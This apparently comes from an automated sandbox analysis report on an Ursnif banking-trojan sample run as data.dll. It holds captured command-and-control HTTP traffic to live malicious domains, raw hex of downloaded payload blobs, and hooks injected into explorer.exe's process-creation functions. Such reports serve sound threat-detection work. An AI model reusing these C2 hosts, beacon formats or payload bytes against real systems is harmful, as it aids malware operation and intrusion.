                                                          Data Ascii: Kc^8fP1c[98P1d7Q"q8}D?.#'TM9"3 iHQs.eR.BNJ]/(3GF4x]5b|I!8}.V0WAZ`H&HB'JbC/X=RO):z&$zlI'hx#t/~l$_Hz+cK8/9}jLJM:wvj_rV6|*/=thO-2 WRv>I/I"cnBb[#\(2g!M}@gl:,l*a}LC*a MMpV+8+,$E<)xRqJ>Lf<eIPw?!l1TOS+[V;g2v+00K$2)i/nM[[bd[h]-0V)`H*jYFB&?I=@|)V-B2b2fT.!')u3#3,\r)O_w?yZit`)$oZHO`n}hsJ1_8zA(z/h!'bg^y7EFtK2h_uvd7r8J"0`%1J`Wx+ i-rB%!n'D<]xfza


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
3           192.168.2.4  49779        194.147.86.221   80                C:\Windows\System32\loaddll32.exe
Timestamp                              kBytes transferred  Direction  Data
Oct 7, 2021 01:32:20.827048063 CEST    2263                OUT        GET /WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
Oct 7, 2021 01:32:21.292851925 CEST    2265                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:21 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 1967
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e32053f1dd.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: e5 c1 56 cb d2 bb c1 47 92 c8 de b0 c2 f0 39 69 47 11 2e 60 1f dd 68 78 fc 23 d6 e7 fc ae b7 40 5a c6 60 35 a7 22 9b 2b 3c ee 7d b0 80 8e 14 c2 33 ee 94 89 b6 17 c2 f9 e4 1c 85 11 43 3b 10 94 fe a4 8f a5 e3 ae c3 af 69 03 bd 33 cd dc 28 db 4e 53 1c 6f 23 34 09 ec f2 5c d1 1d 01 90 01 c9 92 47 52 ef 5c a0 ec c1 a7 93 6e 6b e6 71 03 f5 13 18 de d8 c4 36 f4 bf e4 0d 79 a3 0d a9 44 77 1e 49 cd 90 2a c5 e4 4c e7 47 8d e5 fb d6 38 82 4e c7 20 74 be 7c e3 23 a9 81 be ba 13 0c d2 71 1a 94 17 61 f6 9d c2 5f 2e e2 09 6c a4 1c 9b 1d bc bb 77 f8 74 a9 38 bb 63 60 2d 93 a8 9f db 52 d7 bc 2d 5c 90 e7 b0 55 de d8 3d 7d c0 7e bd 29 32 ca ce b1 d4 55 7a ec ef 1a 65 c7 98 a4 9d ab 8b bf 4f 9f f2 ee a5 a0 04 d9 c7 9e be 2e 21 a5 16 c5 e2 87 d8 e8 68 ed 7e 91 e6 5a a4 f7 5a 64 77 8c 11 2b f3 99 50 4d 1c c1 c8 8f 98 ed da 6c 95 df 12 0c 7f 90 85 13 7a f7 7c 30 78 2b 0e b1 e0 48 d8 82 6a b6 e6 e0 38 dc dc 90 39 b6 46 ed d6 8b ec 9b 2c 37 9d fb ac 5f 1f 99 2e a4 70 b3 28 4c e5 d0 b5 8a 67 8c 21 5f aa 00 5a 6c d3 7c 5f dc bd e8 d4 e3 08 39 73 f8 5c f0 71 0b 96 6f 50 72 c8 8f 0c ca 1a 5b 41 4d 47 09 fc 88 c1 4e 3f c2 7f ad ad c3 a6 89 7c 5c 0f 05 9b 46 66 9c bd c8 f0 52 e3 d5 2f bf 6b c1 1f ee d1 cd 90 8b 3a d4 91 09 f0 d4 2e b2 90 71 1b b3 64 24 5c 70 9f 0c e9 e3 49 9f 06 a3 04 28 3c 2d cc 82 85 57 d5 0c b2 41 69 fc bd 7d 1b 44 96 0c 9e c0 d3 c2 da d4 e4 d2 e7 ec 46 cc b6 0b e7 ab e4 ed 8a fa 68 df 94 b2 81 42 15 db c6 bc a6 c9 33 ac 2a e4 3b 76 a9 28 4c 22 7a bd 18 b1 e9 b9 5a 62 fc fd 8c 25 15 5f ac 37 bd 57 c2 c8 f6 0f ad 2f 5f 70 6c 07 02 f9 8f d0 56 bf 6e e0 5c e3 6e 08 e7 5e a4 80 2a b5 10 61 66 f3 6e 72 07 dd 79 7b 01 49 50 25 f8 17 5e 45 09 fc 92 3d 56 1b 9b 0a cd 88 d2 76 98 e8 3c 59 a1 d3 cb 68 2f 50 76 07 a1 eb 6d 9f 41 30 19 a3 9f 58 5d 7e c4 71 2d 29 f8 1d a7 cf ea f1 65 2c fb d1 7b 1b 99 dc 1f a1 92 94 e0 9f 2e 1f 73 9a 09 ec 97 d3 b9 54 3a bc c5 fc ae 1a 79 b6 1a e4 af 43 fb 97 b7 62 0e cb 4b 14 a1 b0 a5 74 
fc a7 63 7d c2 f9 b6 68 4d 59 8d eb b1 0f b5 17 02 ba 96 5e 34 ef 0b 4f 58 41 df 52 dc d3 dd 0d 3c 4d b7 8a 5e ef a8 68 f6 63 fa bc 0e a9 17 cc 52 c8 42 23 52 be 42 c8 f3 87 81 bf b7 a7 5c 20 aa 58 42 97 0f 38 03 75 1c 52 6d 8f e9 c5 9d 00 8d 13 a7 dc 93 b8 42 86 d3 c5 04 a4 4a df a8 26 c7 39 29 23 0e 15 b8 79 47 43 32 5b 81 a8 ff c8 d9 2e b3 df f0 cb 97 18 5b 41 9a f6 ce 81 9d ea 6a 11 14 4d 90 00 a7 44 61 a9 ac 2f 2a 2d eb 89 9d dd 83 71 6a 05 02 72 0e be 3e 80 92 66 63 2e 7d 94 12 9d 40 2b 53 0e f5 fa df aa f5 8c 3b ef d6 85 15 55 88 e0 0e 69 e6 53 ee 3f b5 19 88 c0 b0 8a 99 ad 63 f3 63 b0 04 86 4c 29 60 d3 e2 21 ce e6 15 22 95 b1 36 9f 81 58 74 cc 11 62 4a 66 07 8c 8e e3 e3 ae 72 1f 41 cb c9 a2 63 e7 66 52 97 00 78 d5 8c 0e 33 8b 58 2b 2a ee a0 32 00 8f 21 ff 18 d4 92 0c 0a ce 22 ea 1e dc 7c c6 cf 90 bb ec 64 61 bb
                                                          Data Ascii: VG9iG.`hx#@Z`5"+<}3C;i3(NSo#4\GR\nkq6yDwI*LG8N t|#qa_.lwt8c`-R-\U=}~)2UzeO.!h~ZZdw+PMlz|0x+Hj89F,7_.p(Lg!_Zl|_9s\qoPr[AMGN?|\FfR/k:.qd$\pI(<-WAi}DFhB3*;v(L"zZb%_7W/_plVn\n^*afnry{IP%^E=Vv<Yh/PvmA0X]~q-)e,{.sT:yCbKtc}hMY^4OXAR<M^hcRB#RB\ XB8uRmBJ&9)#yGC2[.[AjMDa/*-qjr>fc.}@+S;UiS?ccL)`!"6XtbJfrAcfRx3X+*2!"|da


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          4 | 192.168.2.4 | 49780 | 194.147.86.221 | 80 | C:\Windows\System32\loaddll32.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 7, 2021 01:32:20.886424065 CEST | 2264 | OUT | GET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:21.568727970 CEST | 2268 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:21 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 247962
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e320583a02.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 4b 63 5e 38 66 50 d7 31 63 15 5b 39 38 df 50 31 0b 84 05 64 b8 37 51 dd f3 b6 04 c3 16 22 71 14 38 f4 7d b3 44 05 f2 d2 3f 2e 23 27 ff 54 f2 df 8f 4d d1 03 cb 39 22 a7 a0 d6 cf 33 d2 20 69 a7 48 95 51 bb d7 73 af 02 c4 2e c3 eb c8 bd ef 00 ff 65 01 f5 dd 52 c4 15 ba ea 88 99 1e 91 2e 0a c6 42 c0 f8 97 03 9a df 4e 4a fa 1b f1 ab 5d 10 93 0f f1 0b 1b 86 bb 17 2f d8 28 81 d4 bc 33 93 47 c4 d6 b2 46 34 1f b7 95 87 78 ed 5d f1 35 62 a5 7c 49 84 c1 10 21 38 d4 fd a3 9e 7d 2e 8e 56 98 0f ec 30 57 09 0c 01 41 9d 5a b6 de 60 48 26 96 48 42 27 4a a5 80 7f 62 17 fd e2 13 c2 c5 ab 43 a2 f5 2f ad c1 99 58 17 18 a2 3d 52 4f fe 1e ec 29 04 3a e2 7a 26 af 18 24 7a cb de 04 e8 6c 49 05 27 68 d5 78 23 74 2f 0e f9 9e 7e 7f 80 6c 92 24 5f 91 91 0a 48 88 f4 cb 7a dc 12 db 2b 81 11 63 4b ff 15 1c 02 38 d7 b9 b7 2f 84 39 7d f3 6a 4c c0 9b 4a 4d b3 ea 3a 77 d5 8b 93 76 d2 9b 6a 5f 9a 72 d6 56 36 87 03 f4 7c 2a 2f ee 3d 17 74 68 aa 4f d5 c2 df 2d fd ad 9b 32 83 86 20 57 52 11 8c 76 3e 49 2f 9e 49 9a 22 8f 89 17 c8 63 9d bb 90 b5 98 cf 9b 6e 42 e4 b9 b5 bf e6 c7 ec 82 b5 a3 62 a8 a1 10 5b bf 23 02 d1 e7 5c 28 c0 bf 9a f2 ec b8 32 e8 67 87 21 4d cf 7d d2 40 01 0d 17 67 0a 6c 3a 98 bb 13 1f 2c 6c b8 bb 0a de 2a b6 61 d2 fe e3 7d 87 f2 12 a3 8a a1 ac 11 c1 db d5 4c fb 43 98 2a 61 20 4d 94 9c 4d e1 70 56 c5 ac 2b 38 2b b9 2c 8c 98 9d e7 24 c5 e9 18 ab 45 3c e8 29 f8 78 52 d9 f9 71 4a fb ac a5 0e 8c 86 92 01 b1 3e 4c bc 66 9d 84 a0 9c cd 17 e7 3c 16 f2 65 49 50 77 e2 e1 3f 21 6c 31 54 ae a1 f8 e1 4f f6 53 2b 93 b5 02 af 5b 56 3b bf b7 c0 1d 67 da 32 af ee d7 00 dc 05 76 aa b1 8b d2 2b e2 91 fc f8 30 30 0b b0 4b 24 32 18 c0 8b cb 29 ba 69 2f 09 99 6e 4d 5b 1a b7 02 5b ac 62 64 d7 ea ed 1f 5b 68 5d 14 2d f5 03 c4 a8 bf 30 cf 56 29 e9 d4 d7 60 48 2a 99 02 86 80 6a 59 46 42 80 ed 26 f7 3f 49 0f 3d 94 db e5 db 40 9c d2 ff 8f 7c 1c 29 ec 56 ee a5 2d 42 32 15 a1 a2 62 a1 32 ee 09 b8 e6 7f 66 84 54 be 2e 0c 21 03 8f 94 27 ff 29 96 ce e3 
a5 09 75 c1 33 0f fb 23 85 33 2c dd cd 8c 5c 72 a0 84 29 4f c0 b7 5f 77 3f 79 ca 9b a4 8d 0d f7 ca fc 5a 69 ea b1 a9 1d e9 74 60 1b b5 29 e2 24 03 cf b1 6f 5a db b7 48 92 cd f2 fd 8c b9 ce f7 cc 4f 60 03 94 af 86 ab e0 6e bb 16 e6 7f 86 b9 e0 7d ea ed a9 68 a5 a9 ba 8d 73 f5 eb c8 1c 92 4a dd e7 19 31 5f 38 ad db ce f3 ac 7a b2 b5 fe 0a ac e0 41 ec a1 af db 28 94 94 bc 7a c1 ee 19 d3 e4 07 2f a4 68 b7 a3 21 27 b5 62 67 5e 86 79 37 b7 ca 06 9a 89 45 83 98 c8 46 18 d8 74 9b c8 4b ae ef c2 93 32 68 07 14 1a a2 5f 1f 75 76 bb 64 e1 da f2 37 dc 72 1a 13 f5 38 4a ad d5 8b 22 30 d4 8f 94 60 1d 25 e0 dc 31 04 db d5 f8 b3 94 df 0f 4a 60 19 57 bc c4 a3 89 84 04 a6 78 d7 8c 0a 99 e1 be 0b c5 d2 2b 81 da 20 69 2d 8d 72 c2 42 25 d8 21 6e a3 27 05 7f 44 cd 15 98 e1 9b 1b 3c 07 1e f1 1b ce fc ec 5d fb 78 b3 66 7a ca 83 1d a3 61
                                                          Data Ascii: Kc^8fP1c[98P1d7Q"q8}D?.#'TM9"3 iHQs.eR.BNJ]/(3GF4x]5b|I!8}.V0WAZ`H&HB'JbC/X=RO):z&$zlI'hx#t/~l$_Hz+cK8/9}jLJM:wvj_rV6|*/=thO-2 WRv>I/I"cnBb[#\(2g!M}@gl:,l*a}LC*a MMpV+8+,$E<)xRqJ>Lf<eIPw?!l1TOS+[V;g2v+00K$2)i/nM[[bd[h]-0V)`H*jYFB&?I=@|)V-B2b2fT.!')u3#3,\r)O_w?yZit`)$oZHO`n}hsJ1_8zA(z/h!'bg^y7EFtK2h_uvd7r8J"0`%1J`Wx+ i-rB%!n'D<]xfza


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          5 | 192.168.2.4 | 49781 | 194.147.86.221 | 80 | C:\Windows\System32\loaddll32.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 7, 2021 01:32:23.671128988 CEST | 2525 | OUT | GET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:24.126127005 CEST | 2527 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:24 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 1967
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3208164af.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: e5 c1 56 cb d2 bb c1 47 92 c8 de b0 c2 f0 39 69 47 11 2e 60 1f dd 68 78 fc 23 d6 e7 fc ae b7 40 5a c6 60 35 a7 22 9b 2b 3c ee 7d b0 80 8e 14 c2 33 ee 94 89 b6 17 c2 f9 e4 1c 85 11 43 3b 10 94 fe a4 8f a5 e3 ae c3 af 69 03 bd 33 cd dc 28 db 4e 53 1c 6f 23 34 09 ec f2 5c d1 1d 01 90 01 c9 92 47 52 ef 5c a0 ec c1 a7 93 6e 6b e6 71 03 f5 13 18 de d8 c4 36 f4 bf e4 0d 79 a3 0d a9 44 77 1e 49 cd 90 2a c5 e4 4c e7 47 8d e5 fb d6 38 82 4e c7 20 74 be 7c e3 23 a9 81 be ba 13 0c d2 71 1a 94 17 61 f6 9d c2 5f 2e e2 09 6c a4 1c 9b 1d bc bb 77 f8 74 a9 38 bb 63 60 2d 93 a8 9f db 52 d7 bc 2d 5c 90 e7 b0 55 de d8 3d 7d c0 7e bd 29 32 ca ce b1 d4 55 7a ec ef 1a 65 c7 98 a4 9d ab 8b bf 4f 9f f2 ee a5 a0 04 d9 c7 9e be 2e 21 a5 16 c5 e2 87 d8 e8 68 ed 7e 91 e6 5a a4 f7 5a 64 77 8c 11 2b f3 99 50 4d 1c c1 c8 8f 98 ed da 6c 95 df 12 0c 7f 90 85 13 7a f7 7c 30 78 2b 0e b1 e0 48 d8 82 6a b6 e6 e0 38 dc dc 90 39 b6 46 ed d6 8b ec 9b 2c 37 9d fb ac 5f 1f 99 2e a4 70 b3 28 4c e5 d0 b5 8a 67 8c 21 5f aa 00 5a 6c d3 7c 5f dc bd e8 d4 e3 08 39 73 f8 5c f0 71 0b 96 6f 50 72 c8 8f 0c ca 1a 5b 41 4d 47 09 fc 88 c1 4e 3f c2 7f ad ad c3 a6 89 7c 5c 0f 05 9b 46 66 9c bd c8 f0 52 e3 d5 2f bf 6b c1 1f ee d1 cd 90 8b 3a d4 91 09 f0 d4 2e b2 90 71 1b b3 64 24 5c 70 9f 0c e9 e3 49 9f 06 a3 04 28 3c 2d cc 82 85 57 d5 0c b2 41 69 fc bd 7d 1b 44 96 0c 9e c0 d3 c2 da d4 e4 d2 e7 ec 46 cc b6 0b e7 ab e4 ed 8a fa 68 df 94 b2 81 42 15 db c6 bc a6 c9 33 ac 2a e4 3b 76 a9 28 4c 22 7a bd 18 b1 e9 b9 5a 62 fc fd 8c 25 15 5f ac 37 bd 57 c2 c8 f6 0f ad 2f 5f 70 6c 07 02 f9 8f d0 56 bf 6e e0 5c e3 6e 08 e7 5e a4 80 2a b5 10 61 66 f3 6e 72 07 dd 79 7b 01 49 50 25 f8 17 5e 45 09 fc 92 3d 56 1b 9b 0a cd 88 d2 76 98 e8 3c 59 a1 d3 cb 68 2f 50 76 07 a1 eb 6d 9f 41 30 19 a3 9f 58 5d 7e c4 71 2d 29 f8 1d a7 cf ea f1 65 2c fb d1 7b 1b 99 dc 1f a1 92 94 e0 9f 2e 1f 73 9a 09 ec 97 d3 b9 54 3a bc c5 fc ae 1a 79 b6 1a e4 af 43 fb 97 b7 62 0e cb 4b 14 a1 b0 a5 74 
fc a7 63 7d c2 f9 b6 68 4d 59 8d eb b1 0f b5 17 02 ba 96 5e 34 ef 0b 4f 58 41 df 52 dc d3 dd 0d 3c 4d b7 8a 5e ef a8 68 f6 63 fa bc 0e a9 17 cc 52 c8 42 23 52 be 42 c8 f3 87 81 bf b7 a7 5c 20 aa 58 42 97 0f 38 03 75 1c 52 6d 8f e9 c5 9d 00 8d 13 a7 dc 93 b8 42 86 d3 c5 04 a4 4a df a8 26 c7 39 29 23 0e 15 b8 79 47 43 32 5b 81 a8 ff c8 d9 2e b3 df f0 cb 97 18 5b 41 9a f6 ce 81 9d ea 6a 11 14 4d 90 00 a7 44 61 a9 ac 2f 2a 2d eb 89 9d dd 83 71 6a 05 02 72 0e be 3e 80 92 66 63 2e 7d 94 12 9d 40 2b 53 0e f5 fa df aa f5 8c 3b ef d6 85 15 55 88 e0 0e 69 e6 53 ee 3f b5 19 88 c0 b0 8a 99 ad 63 f3 63 b0 04 86 4c 29 60 d3 e2 21 ce e6 15 22 95 b1 36 9f 81 58 74 cc 11 62 4a 66 07 8c 8e e3 e3 ae 72 1f 41 cb c9 a2 63 e7 66 52 97 00 78 d5 8c 0e 33 8b 58 2b 2a ee a0 32 00 8f 21 ff 18 d4 92 0c 0a ce 22 ea 1e dc 7c c6 cf 90 bb ec 64 61 bb
                                                          Data Ascii: VG9iG.`hx#@Z`5"+<}3C;i3(NSo#4\GR\nkq6yDwI*LG8N t|#qa_.lwt8c`-R-\U=}~)2UzeO.!h~ZZdw+PMlz|0x+Hj89F,7_.p(Lg!_Zl|_9s\qoPr[AMGN?|\FfR/k:.qd$\pI(<-WAi}DFhB3*;v(L"zZb%_7W/_plVn\n^*afnry{IP%^E=Vv<Yh/PvmA0X]~q-)e,{.sT:yCbKtc}hMY^4OXAR<M^hcRB#RB\ XB8uRmBJ&9)#yGC2[.[AjMDa/*-qjr>fc.}@+S;UiS?ccL)`!"6XtbJfrAcfRx3X+*2!"|da


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          6 | 192.168.2.4 | 49862 | 194.147.86.221 | 80 | C:\Windows\System32\loaddll32.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 7, 2021 01:34:00.834180117 CEST | 10309 | OUT | GET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: art.microsoftsofymicrosoftsoft.at
                                                          Oct 7, 2021 01:34:01.322679043 CEST | 10310 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:34:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                          7 | 192.168.2.4 | 49863 | 194.147.86.221 | 80 | C:\Windows\System32\loaddll32.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 7, 2021 01:34:10.121752024 CEST | 10311 | OUT | POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Content-Length: 2
                                                          Host: art.microsoftsofymicrosoftsoft.at
                                                          Oct 7, 2021 01:34:10.640894890 CEST | 10311 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:34:10 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 146
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Code Manipulations

                                                          User Modules

                                                          Hook Summary

                                                          Function Name | Hook Type | Active in Processes
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | explorer.exe
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | explorer.exe
                                                          CreateProcessAsUserW | EAT | explorer.exe
                                                          CreateProcessAsUserW | INLINE | explorer.exe
                                                          CreateProcessW | EAT | explorer.exe
                                                          CreateProcessW | INLINE | explorer.exe
                                                          CreateProcessA | EAT | explorer.exe
                                                          CreateProcessA | INLINE | explorer.exe

                                                          Processes

                                                          Process: explorer.exe, Module: user32.dll
                                                          Function Name | Hook Type | New Data
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFABB035200
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 6BEF6FC
                                                          Process: explorer.exe, Module: KERNEL32.DLL
                                                          Function Name | Hook Type | New Data
                                                          CreateProcessAsUserW | EAT | 7FFABB03521C
                                                          CreateProcessAsUserW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          CreateProcessW | EAT | 7FFABB035200
                                                          CreateProcessW | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          CreateProcessA | EAT | 7FFABB03520E
                                                          CreateProcessA | INLINE | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          Process: explorer.exe, Module: WININET.dll
                                                          Function Name | Hook Type | New Data
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW | IAT | 7FFABB035200
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueW | IAT | 6BEF6FC

                                                          Statistics

                                                          Behavior


                                                          System Behavior

                                                          General

                                                          Start time: 01:30:58
                                                          Start date: 07/10/2021
                                                          Path: C:\Windows\System32\loaddll32.exe
                                                          Wow64 process (32bit): true
                                                          Commandline: loaddll32.exe 'C:\Users\user\Desktop\data.dll'
                                                          Imagebase: 0xc70000
                                                          File size: 893440 bytes
                                                          MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, Author: Joe Security
